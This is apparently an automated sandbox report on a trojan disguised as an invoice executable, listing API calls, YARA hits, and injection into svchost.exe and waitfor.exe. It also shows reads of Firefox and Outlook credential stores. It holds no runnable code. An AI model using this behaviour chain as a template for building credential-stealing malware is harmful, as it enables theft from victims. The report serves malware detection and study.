                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002C4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_002C4164
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002C4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_002C4164
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002C3F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_002C3F66
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002B001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_002B001C
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002DCABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_002DCABC

                E-Banking Fraud

                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2297054463.0000000003200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4469589553.0000000000CB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2296706560.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4468208787.0000000000820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4469588528.0000000002FB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4469517194.0000000000C60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2298090586.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: This is a third-party compiled AutoIt script.0_2_00253B3A
                Source: Proforma invoice - Arancia NZ.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: Proforma invoice - Arancia NZ.exe, 00000000.00000000.2003704468.0000000000304000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_a3e781bd-f
                Source: Proforma invoice - Arancia NZ.exe, 00000000.00000000.2003704468.0000000000304000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_1bbb6621-a
                Source: Proforma invoice - Arancia NZ.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_908154c8-3
                Source: Proforma invoice - Arancia NZ.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_4d261512-4
                Source: initial sampleStatic PE information: Filename: Proforma invoice - Arancia NZ.exe
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042CFC3 NtClose,2_2_0042CFC3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040AE71 NtAllocateVirtualMemory,2_2_0040AE71
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372B60 NtClose,LdrInitializeThunk,2_2_03372B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03372DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03372C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033735C0 NtCreateMutant,LdrInitializeThunk,2_2_033735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03374340 NtSetContextThread,2_2_03374340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03374650 NtSuspendThread,2_2_03374650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372BA0 NtEnumerateValueKey,2_2_03372BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372B80 NtQueryInformationFile,2_2_03372B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372BF0 NtAllocateVirtualMemory,2_2_03372BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372BE0 NtQueryValueKey,2_2_03372BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372AB0 NtWaitForSingleObject,2_2_03372AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372AF0 NtWriteFile,2_2_03372AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372AD0 NtReadFile,2_2_03372AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372F30 NtCreateSection,2_2_03372F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372F60 NtCreateProcessEx,2_2_03372F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372FB0 NtResumeThread,2_2_03372FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372FA0 NtQuerySection,2_2_03372FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372F90 NtProtectVirtualMemory,2_2_03372F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372FE0 NtCreateFile,2_2_03372FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372E30 NtWriteVirtualMemory,2_2_03372E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372EA0 NtAdjustPrivilegesToken,2_2_03372EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372E80 NtReadVirtualMemory,2_2_03372E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372EE0 NtQueueApcThread,2_2_03372EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372D30 NtUnmapViewOfSection,2_2_03372D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372D10 NtMapViewOfSection,2_2_03372D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372D00 NtSetInformationFile,2_2_03372D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372DB0 NtEnumerateKey,2_2_03372DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372DD0 NtDelayExecution,2_2_03372DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372C00 NtQueryInformationProcess,2_2_03372C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372C60 NtCreateKey,2_2_03372C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372CA0 NtQueryInformationToken,2_2_03372CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372CF0 NtOpenProcess,2_2_03372CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372CC0 NtQueryVirtualMemory,2_2_03372CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03373010 NtOpenDirectoryObject,2_2_03373010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03373090 NtSetValueKey,2_2_03373090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033739B0 NtGetContextThread,2_2_033739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03373D10 NtOpenProcessToken,2_2_03373D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03373D70 NtOpenThread,2_2_03373D70
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002BA1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_002BA1EF
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002A8310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_002A8310
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002B51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_002B51BD
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_0027D9750_2_0027D975
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_0025FCE00_2_0025FCE0
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002721C50_2_002721C5
Source: Proforma invoice - Arancia NZ.exe, 00000000.00000003.2010779608.00000000036B3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Proforma invoice - Arancia NZ.exe
Source: Proforma invoice - Arancia NZ.exe, 00000000.00000003.2011244293.000000000385D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Proforma invoice - Arancia NZ.exe
Source: Proforma invoice - Arancia NZ.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/3@16/13
Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe | Code function: 0_2_002BA06A GetLastError,FormatMessageW
Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe | Code function: 0_2_002A81CB AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe | Code function: 0_2_002A87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe | Code function: 0_2_002BB333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe | Code function: 0_2_002CEE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe | Code function: 0_2_002C83BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear
Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe | Code function: 0_2_00254E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe | File created: C:\Users\user\AppData\Local\Temp\aut4E08.tmp
Source: Proforma invoice - Arancia NZ.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: waitfor.exe, 00000005.00000002.4468568240.0000000000AC2000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000003.2489326595.0000000000ACB000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4468568240.0000000000AEE000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4468568240.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000003.2487075375.0000000000AC2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Proforma invoice - Arancia NZ.exe | ReversingLabs: Detection: 47%
Source: unknown | Process created: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe "C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe"
Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe"
Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe | Process created: C:\Windows\SysWOW64\waitfor.exe "C:\Windows\SysWOW64\waitfor.exe"
Source: C:\Windows\SysWOW64\waitfor.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe | Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\waitfor.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\waitfor.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\waitfor.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\waitfor.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\waitfor.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\waitfor.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\waitfor.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\waitfor.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\waitfor.exe | Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\waitfor.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\waitfor.exe | Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\waitfor.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\waitfor.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\waitfor.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\waitfor.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\waitfor.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\waitfor.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\waitfor.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\waitfor.exe | Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\waitfor.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\waitfor.exe | Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\waitfor.exe | Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\waitfor.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\waitfor.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\waitfor.exe | Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe | Section loaded: wininet.dll
Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe | Section loaded: mswsock.dll
Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe | Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe | Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe | Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\waitfor.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
Source: C:\Windows\SysWOW64\waitfor.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: Proforma invoice - Arancia NZ.exe | Static file information: File size 1207808 > 1048576
Source: Proforma invoice - Arancia NZ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Proforma invoice - Arancia NZ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Proforma invoice - Arancia NZ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Proforma invoice - Arancia NZ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Proforma invoice - Arancia NZ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Proforma invoice - Arancia NZ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Proforma invoice - Arancia NZ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: waitfor.pdbGCTL source: svchost.exe, 00000002.00000003.2264065169.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000004.00000002.4468779110.0000000001238000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: waitfor.pdb source: svchost.exe, 00000002.00000003.2264065169.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000004.00000002.4468779110.0000000001238000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: nfGtWoQBhJSQ.exe, 00000004.00000002.4468208625.000000000003E000.00000002.00000001.01000000.00000005.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000000.2371266085.000000000003E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: Proforma invoice - Arancia NZ.exe, 00000000.00000003.2010896437.0000000003730000.00000004.00001000.00020000.00000000.sdmp, Proforma invoice - Arancia NZ.exe, 00000000.00000003.2011131820.0000000003590000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2205330195.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2297091430.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2297091430.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2203022832.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4469911093.0000000004A7E000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000005.00000003.2297008372.000000000457A000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000003.2307765954.000000000472C000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4469911093.00000000048E0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Proforma invoice - Arancia NZ.exe, 00000000.00000003.2010896437.0000000003730000.00000004.00001000.00020000.00000000.sdmp, Proforma invoice - Arancia NZ.exe, 00000000.00000003.2011131820.0000000003590000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2205330195.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2297091430.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2297091430.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2203022832.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4469911093.0000000004A7E000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000005.00000003.2297008372.000000000457A000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000003.2307765954.000000000472C000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4469911093.00000000048E0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: waitfor.exe, 00000005.00000002.4470341771.0000000004F0C000.00000004.10000000.00040000.00000000.sdmp, waitfor.exe, 00000005.00000002.4468568240.0000000000A46000.00000004.00000020.00020000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000025EC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2596011160.000000003A8DC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: waitfor.exe, 00000005.00000002.4470341771.0000000004F0C000.00000004.10000000.00040000.00000000.sdmp, waitfor.exe, 00000005.00000002.4468568240.0000000000A46000.00000004.00000020.00020000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000025EC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2596011160.000000003A8DC000.00000004.80000000.00040000.00000000.sdmp
                Source: Proforma invoice - Arancia NZ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: Proforma invoice - Arancia NZ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: Proforma invoice - Arancia NZ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: Proforma invoice - Arancia NZ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: Proforma invoice - Arancia NZ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe Code function: 0_2_00254B37 LoadLibraryA,GetProcAddress,0_2_00254B37
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe Code function: 0_2_00278945 push ecx; ret 0_2_00278958
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041F993 push edi; iretd 2_2_0041F99F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041A218 push ebp; ret 2_2_0041A219
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00405CA0 push ds; iretd 2_2_00405CA1
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00403580 push eax; ret 2_2_00403582
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00416E2A push esp; iretd 2_2_00416E2B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00419764 push ebp; ret 2_2_004197A3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004167F3 push FFFFFFBEh; retf 2_2_0041683D
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033309AD push ecx; mov dword ptr [esp], ecx 2_2_033309B6
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe Code function: 4_2_032C0B6E push ecx; retf 4_2_032C0B6F
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe Code function: 4_2_032C3B8E push ebp; ret 4_2_032C3BCD
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe Code function: 4_2_032C1254 push esp; iretd 4_2_032C1255
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe Code function: 4_2_032B00CA push ds; iretd 4_2_032B00CB
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe Code function: 4_2_032C4642 push ebp; ret 4_2_032C4643
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe Code function: 4_2_032C9DAF push edi; iretd 4_2_032C9DC9
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe Code function: 4_2_032C0C1D push FFFFFFBEh; retf 4_2_032C0C67
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe Code function: 4_2_032C0C1B push FFFFFFBEh; retf 4_2_032C0C67
